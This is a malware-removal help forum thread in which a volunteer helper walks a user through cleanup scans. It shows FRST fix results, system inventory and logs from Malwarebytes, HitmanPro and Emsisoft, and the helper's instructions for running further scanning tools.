PC-CCID (HKLM\...\{3DCDFCDB-4D96-4CF0-9BB3-C91DAE9073F3}) (Version: 2.0.0 - Gemalto) Hidden
PDF Settings CS6 (HKLM-x32\...\{BFEAAE77-BD7F-4534-B286-9C5CB4697EB1}) (Version: 11.0 - Adobe Systems Incorporated) Hidden
Pegasus Mail (HKLM-x32\...\Pegasus Mail) (Version:  - David Harris)
Pegasus Mail HTML Renderer 2.4.7.2 (HKLM-x32\...\{A9F5E1E1-1281-4862-90B4-6CF8E6AF83CE}_is1) (Version:  - Micha's Midnight Manufacture)
PhotoShowExpress (HKLM-x32\...\{3250260C-7A95-4632-893B-89657EB5545B}) (Version: 2.0.063 - Sonic Solutions) Hidden
piaip AppLocale (HKLM-x32\...\{394BE3D9-7F57-4638-A8D1-1D88671913B7}) (Version: 1.0.0 - MS)
Pidgin (HKLM-x32\...\Pidgin) (Version: 2.9.0 - )
PowerISO (HKLM-x32\...\PowerISO) (Version: 6.2 - Power Software Ltd)
Preboot Manager (HKLM\...\{3A6BE9F4-5FC8-44BB-BE7B-32A29607FEF6}) (Version: 03.03.00.049 - Wave Systems Corp.) Hidden
PremiumSoft Navicat Lite 9.0 (HKLM-x32\...\PremiumSoft Navicat Lite_is1) (Version:  - PremiumSoft CyberTech Ltd.)
Private Information Manager (HKLM\...\{0B0A2153-58A6-4244-B458-25EDF5FCD809}) (Version: 07.01.00.007 - Wave Systems Corp.) Hidden
QuickTime (HKLM-x32\...\{0E64B098-8018-4256-BA23-C316A43AD9B0}) (Version: 7.72.80.56 - Apple Inc.)
RaidCall (HKLM-x32\...\RaidCall) (Version: 7.3.6-1.0.12972.94 - raidcall.com)
RBVirtualFolder64Inst (HKLM\...\{9D6DFAD6-09E5-445E-A4B5-A388FEEBD90D}) (Version: 1.00.0000 - Roxio, Inc.) Hidden
Roxio Creator Starter (HKLM-x32\...\{6F0BBEFE-BE1C-419B-BA1F-D36C9E7915BC}) (Version: 12.1.77.0 - Roxio)
Roxio File Backup (HKLM\...\{60B2315F-680F-4EB3-B8DD-CCDC86A7CCAB}) (Version: 1.3.2 - Roxio) Hidden
Safari (HKLM-x32\...\{C779648B-410E-4BBA-B75B-5815BCEFE71D}) (Version: 5.34.57.2 - Apple Inc.)
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version:  - 2K Games, Inc.)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.4.0.9058 - Microsoft Corporation)
Skype™ 7.4 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.4.102 - Skype Technologies S.A.)
Sonic CinePlayer Decoder Pack (HKLM-x32\...\{9A00EC4E-27E1-42C4-98DD-662F32AC8870}) (Version: 4.3.0 - Sonic Solutions) Hidden
Sophos Virus Removal Tool (HKLM-x32\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.1 - Sophos Limited)
SPBA 5.9 (HKLM\...\{2EECD5EF-5095-467C-B80C-4AB3096EFD60}) (Version: 5.9.4.6686 - UPEK Inc.) Hidden
SQL Server 2012 Common Files (HKLM\...\{1D411379-9CE0-4B13-A19B-72D3222DD620}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Common Files (HKLM\...\{202AAF1F-69AA-442A-B59F-6B54B1AD07C6}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Services (HKLM\...\{18B2A97C-92C3-4AC7-BE72-F823E0BC895B}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Services (HKLM\...\{84FBCA4A-D650-4B0D-8094-EC0671FA9B91}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Shared (HKLM\...\{54FF8FAB-DE27-4187-82F1-EBAE6AEE869A}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Shared (HKLM\...\{6603C2CE-3C54-4F1D-92F9-8390CD4CCCA8}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Management Studio (HKLM\...\{26BFF1F1-5C03-4C55-9C7C-FD65889AFA70}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Management Studio (HKLM\...\{A7037EB2-F953-4B12-B843-195F4D988DA1}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server Browser for SQL Server 2012 (HKLM-x32\...\{4B9E6EB0-0EED-4E74-9479-F982C3254F71}) (Version: 11.0.2100.60 - Microsoft Corporation)
Sql Server Customer Experience Improvement Program (HKLM\...\{BED1EA3D-592D-4305-9D1F-20F03726EFC1}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
TaxACT 2010 (HKLM-x32\...\TaxACT 2010) (Version:  - 2nd Story Software, Inc.)
TaxACT 2010 Michigan (HKLM-x32\...\TaxACT 2010 Michigan) (Version:  - 2nd Story Software, Inc.)
TaxACT 2011 - 1040 Edition (HKLM-x32\...\TaxACT 2011 - 1040 Edition) (Version:  - 2nd Story Software, Inc.)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.14 - TeamSpeak Systems GmbH)
TeamViewer 8 (HKLM-x32\...\TeamViewer 8) (Version: 8.0.30992 - TeamViewer)
Trend Micro Client/Server Security Agent (HKLM-x32\...\{BED0B8A2-2986-49F8-90D6-FA008D37A3D2}) (Version: 3.0.3152 - Trend Micro)
Trusted Drive Manager (HKLM\...\{6AC87FB3-ACFC-4416-890C-8976D5A9B371}) (Version: 4.0.5.8 - Wave Systems Corp.) Hidden
Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 3.2.1 - Tweaking.com)
Upek Touchchip Fingerprint Reader (HKLM\...\{4E60E212-3177-4B16-BCB3-616CCC52357D}) (Version: 1.2.004 - Dell Inc.) Hidden
Ventrilo Client (HKLM-x32\...\{789289CA-F73A-4A16-A331-54D498CE069F}) (Version: 3.0.8 - Flagship Industries, Inc.)
Visual Studio 2010 Prerequisites - English (HKLM\...\{662014D2-0450-37ED-ABAE-157C88127BEB}) (Version: 10.0.40219 - Microsoft Corporation)
VmciSockets (HKLM\...\{98DE7960-458C-4104-90E9-910389C81AC9}) (Version: 9.1.54.1 - VMware, Inc.) Hidden
VMware Player (HKLM-x32\...\{E452E727-86B8-4233-8CC3-41FD817AFAFF}) (Version: 4.0.4.30409 - VMware, Inc.) Hidden
VMware Player (HKLM-x32\...\VMware_Player) (Version: 4.0.4.30409 - VMware, Inc)
Wave Infrastructure Installer (HKLM\...\{F52ABC1D-5EA4-4FDD-8E5F-CA31428570C0}) (Version: 07.66.40.0008 - Wave Systems Corp) Hidden
Wave Support Software Installer (HKLM\...\{07D618CD-B016-438A-ADC9-A75BD23F85CE}) (Version: 05.13.00.014 - Wave Systems Corp) Hidden
WIDCOMM Bluetooth Software (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.7900 - Broadcom Corporation)
Widevine Media Optimizer IE 6.0.0 (HKCU\...\optimizer_ie) (Version: 6.0.0.12757 - Widevine Technologies)
Windows Driver Package - Dell Inc. PBADRV System  (09/11/2009 1.0.1.6) (HKLM\...\9512AA21B791B05A54E27065C45BBC417AB282DF) (Version: 09/11/2009 1.0.1.6 - Dell Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
WinZip 19.5 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240E9}) (Version: 19.5.11475 - WinZip Computing, S.L. )
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
Yahoo! Detect (HKLM-x32\...\YTdetect) (Version:  - )
 
========================= Devices: ================================
 
Name: Dell Wireless 375 Bluetooth Module
Description: Dell Wireless 375 Bluetooth Module
Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974}
Manufacturer: Broadcom
Service: BTHUSB
Device ID: USB\VID_413C&PID_8187\C0F8DAE3B312
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Device ID: ROOT\*TEREDO\0000
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
 
 
========================= Memory info: ===================================
 
Percentage of memory in use: 61%
Total physical RAM: 3992.93 MB
Available physical RAM: 1548.2 MB
Total Pagefile: 7984.07 MB
Available Pagefile: 5509.65 MB
Total Virtual: 4095.88 MB
Available Virtual: 3973.58 MB
 
========================= Partitions: =====================================
 
1 Drive c: (OS) (Fixed) (Total:450.57 GB) (Free:116.65 GB) NTFS
 
========================= Users: ========================================
 
User accounts for \\SEVILLE
 
Administrator            dell 2                   Guest                    
 
========================= Minidump Files ==================================
 
No minidump file found
 
========================= Restore Points ==================================
 
03-06-2015 04:13:55 Scheduled Checkpoint
03-06-2015 07:13:44 Windows Update
05-06-2015 02:47:30 Checkpoint by HitmanPro
05-06-2015 04:11:35 Checkpoint by HitmanPro
05-06-2015 05:45:45 Checkpoint by HitmanPro
05-06-2015 14:06:59 Checkpoint by HitmanPro
05-06-2015 15:21:21 Checkpoint by HitmanPro
05-06-2015 15:22:15 Removed piaip AppLocale
 
**** End of log ****
 
========= End of CMD: =========
 
C:\Windows\system32\ysxja.exe => moved successfully.
C:\Windows\cygavb.exe => moved successfully.
C:\Windows\zlib.dll => moved successfully.
C:\Windows\mstdcvtr.bat => moved successfully.
C:\Windows\plofgye => moved successfully.
C:\Windows\soxe => moved successfully.
C:\Windows\initcvtr.bat => moved successfully.
C:\Windows\system32\Drivers\healusb.sys => moved successfully.
C:\Windows\system32\cygwin.sys => moved successfully.
C:\Windows\default.cfg => moved successfully.
C:\Windows\FiddlerCore4.dll => moved successfully.
 
=========  chkdsk c: |find /v "percent" >> "%userprofile%\desktop\checkhd.txt" =========
 
The type of the file system is NTFS.
Volume label is OS.
 
WARNING!  F parameter not specified.
Running CHKDSK in read-only mode.
 
CHKDSK is verifying files (stage 1 of 3)...
File verification completed.
  1364 large file records processed.                                   
 
  0 bad file records processed.                                     
 
  2 EA records processed.                                           
 
  139 reparse records processed.                                      
 
CHKDSK is verifying indexes (stage 2 of 3)...
Index verification completed.
  0 unindexed files recovered.                                      
 
CHKDSK is verifying security descriptors (stage 3 of 3)...
Security descriptor verification completed.
  61018 data files processed.                                           
 
CHKDSK is verifying Usn Journal...
Usn Journal verification completed.
Windows has checked the file system and found no problems.
 
 472453119 KB total disk space.
 315075748 KB in 360108 files.
    191668 KB in 61019 indexes.
         0 KB in bad sectors.
    593099 KB in use by the system.
     65536 KB occupied by the log file.
 156592604 KB available on disk.
 
      4096 bytes in each allocation unit.
 118113279 total allocation units on disk.
  39148151 allocation units available on disk.
 
========= End of CMD: =========
 
 
=========  type "C:\Users\dell 2\Desktop\checkhd.txt" =========
 
The system cannot find the file specified.
 
========= End of CMD: =========
 
C:\Windows\System32\Drivers\etc\hosts => moved successfully.
Hosts restored successfully.
 
========= RemoveProxy: =========
 
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
 
 
========= End of RemoveProxy: =========
 
 
=========  netsh winsock reset catalog =========
 
 
Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.
 
 
========= End of CMD: =========
 
 
=========  ipconfig /flushdns =========
 
 
Windows IP Configuration
 
Successfully flushed the DNS Resolver Cache.
 
========= End of CMD: =========
 
EmptyTemp: => 40.3 MB temporary data Removed.
 
 
The system needed a reboot.. 
 
==== End of Fixlog 18:10:25 ====

so far no issues atm.



#10 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:09:00 AM

Posted 08 June 2015 - 07:44 PM

Hi,

 

Let's check for malware leftovers:

 

 

STEP 1

 

 

Please download Malwarebytes Anti-Malware 2.1.6.1022 Final to your desktop.
 

  • Double-click mbam-setup-2.1.6.1022.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.
  • On the Settings tab > Detection and Protection subtab, Detection Options, tick the box 'Scan for rootkits'.
  • Click on the Scan tab, then click on Scan Now >> . If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • With some infections, you may see this message box.
    • 'Could not load DDA driver'
  • Click 'Yes' to this message, to allow the driver to load after a restart.
  • Allow the computer to restart. Continue with the rest of these instructions.
  • When the scan is complete, click Apply Actions.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply.

 

 

STEP 2

 

 

 

1.Please download HitmanPro.

  • For 32-bit Operating System - dEMD6.gif.
  • This is the mirror - dEMD6.gif
  • For 64-bit Operating System - dEMD6.gif
  • This is the mirror - dEMD6.gif

2.Launch the program by double clicking on the 5vo5F.jpg icon. (Windows Vista/7 users right click on the HitmanPro icon and select run as administrator).

Note: If the program won't run please then open the program while holding down the left CTRL key until the program is loaded.

3.Click on the next button. You must agree with the terms of EULA. (if asked)

4.Check the box beside "No, I only want to perform a one-time scan to check this computer".

5.Click on the next button.

6.The program will start to scan the computer. The scan will typically take no more than 2-3 minutes.

7.When the scan is done click on drop-down menu of the found entries (if any) and choose - Apply to all => Ignore <= IMPORTANT!!!

 

6-scanfin-choose.jpg
 
8.Click on the next button.

9.Click on the "Save Log" button.

10.Save that file to your desktop and post the content of that file in your next reply.
 
Note: if there isn't a dropdown menu when the scan is done then please don't delete anything and close HitmanPro

Navigate to C:\ProgramData\HitmanPro\Logs open the report and copy and paste it to your next reply.

 

Note: Programdata is hidden by default. Please make sure that you can view all hidden files. Instructions on how to do this can be found here:
How to see hidden files in Windows

 

 

 

STEP 3

 

 

emsisoft_emergency_kit.pnglogo.png

  • Download EmsisoftEmergencyKit, run the exe and extract the content in a folder of your choice like (C:\EEK) by clicking the Extract button.
  • Double-click the desktop-shortcut called Start Emsisoft Emergency Kit to start the tool.
  • Click on the "Yes" button when asked to obtain the latest malware definitions.
  • Once the update is complete click "Scan".
  • Click on the "Yes" button when asked to enable the scan for Potentially Unwanted Applications.
  • Next click on the Full Scan. When the scan complete, click on the View Report button (don't delete or quarantine anything).
  • Please copy and paste the content of the report in your next reply.

 

 

Regards,

Georgi


cXfZ4wS.png


#11 Mohasaiyan

Mohasaiyan
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:02:00 AM

Posted 08 June 2015 - 09:43 PM

MalwareBytes Scan results

 

 
Scan Date: 2015/06/08
Scan Time: 21:43:03
Logfile: scan060815.txt
Administrator: Yes
 
Version: 2.01.6.1022
Malware Database: v2015.06.08.05
Rootkit Database: v2015.06.02.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: dell 2
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 607475
Time Elapsed: 52 min, 17 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 0
(No malicious items detected)
 
Registry Values: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 0
(No malicious items detected)
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)


#12 Mohasaiyan

Mohasaiyan
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:02:00 AM

Posted 08 June 2015 - 10:45 PM

Hitmanpro scan

 

HitmanPro 3.7.9.241
www.hitmanpro.com
 
   Computer name . . . . : SEVILLE
   Windows . . . . . . . : 6.1.1.7601.X64/4
   User name . . . . . . : Seville\dell 2
   UAC . . . . . . . . . : Enabled
   License . . . . . . . : Paid (362 days left)
 
   Scan date . . . . . . : 2015-06-08 23:15:02
   Scan mode . . . . . . : Normal
   Scan duration . . . . : 27m 15s
   Disk access mode  . . : Direct disk access (SRB)
   Cloud . . . . . . . . : Internet
   Reboot  . . . . . . . : No
 
   Threats . . . . . . . : 0
   Traces  . . . . . . . : 1
 
   Objects scanned . . . : 2,416,861
   Files scanned . . . . : 127,589
   Remnants scanned  . . : 634,468 files / 1,654,804 keys
 
Suspicious files ____________________________________________________________
 
   C:\Users\dell 2\Downloads\FRST64.exe
      Size . . . . . . . : 2,108,928 bytes
      Age  . . . . . . . : 0.2 days (2015-06-08 18:04:38)
      Entropy  . . . . . : 7.5
      SHA-256  . . . . . : 23B98F644F9BFE0B6E32E501CCA88839EA890F22C65C722198E6A4C3C421A628
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 24.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.
      Forensic Cluster
          0.0s C:\Users\dell 2\Downloads\FRST64.exe
          0.8s C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\CmnClnt\ccSubSDK\{6D09DA5A-C577-4963-B560-76E3A774703E}
 
 
 


#13 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:09:00 AM

Posted 09 June 2015 - 04:50 AM

Hi,

 

Nice work. The logs are clean!

Here are the last set of steps just to make sure nothing is lurking in the dark corners. smile.png

 

 

STEP 1

 

 

Before I let you go I'd like to scan your machine with ESET OnlineScan.
 

  • Please download and the run exe from the link below:
    ESET OnlineScan
  • Check esetAcceptTerms.png
  • Click the esetStart.png button.
  • Accept any security warnings from your browser.
  • Check the option beside: Enable detection of potentially unwanted applications
  • Now click on Advanced Settings and make sure that the option Remove found threats is NOT checked, and select the following:
    • Scan archives
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
    • Click on the Change button and select only Operating memory and drive C:\

fhSji42.png

 

  • Push the Start button.
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, push esetListThreats.png
  • Push esetExport.png, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Push the esetBack.png button.
  • Push esetFinish.png

 

 

STEP 2

 

 

Also let's check for outdated and vulnerable software on your pc

 

 

Download Security Check by screen317 from here.

  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.

 

and then if there aren't any issues left I'll give you my final recommendations. :)

Let me know for any remaining issues.

 

 

Regards,

Georgi


cXfZ4wS.png


#14 Mohasaiyan

Mohasaiyan
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:02:00 AM

Posted 09 June 2015 - 10:12 AM

Sorry I had gone to sleep before running emsisoft and that scan did not come back clean.

 

Emsisoft Emergency Kit - Version 9.0
Last update: 2015/06/08 23:18:24
User account: Seville\dell 2
 
Scan settings:
 
Scan type: Full Scan
Objects: Rootkits, Memory, Traces, C:\, Q:\
 
Detect PUPs: On
Scan archives: On
ADS Scan: On
File extension filter: Off
Advanced caching: On
Direct disk access: Off
 
Scan start: 2015/06/08 23:20:51
Value: HKEY_USERS\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM -> DISABLETASKMGR detected: Setting.DisableTaskMgr (A)
Value: HKEY_USERS\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM -> DISABLEREGISTRYTOOLS detected: Setting.DisableRegistryTools (A)
 
Scanned 448263
Found 2
 
Scan end: 2015/06/09 2:04:36
Scan time: 2:43:45


#15 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:09:00 AM

Posted 09 June 2015 - 11:05 AM

Hi,

 

The log is clean. You can ignore those detections.

Please proceed with the rest of the steps and then when done I'll give you my final recommendations.

 

Regards,

Georgi


cXfZ4wS.png





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users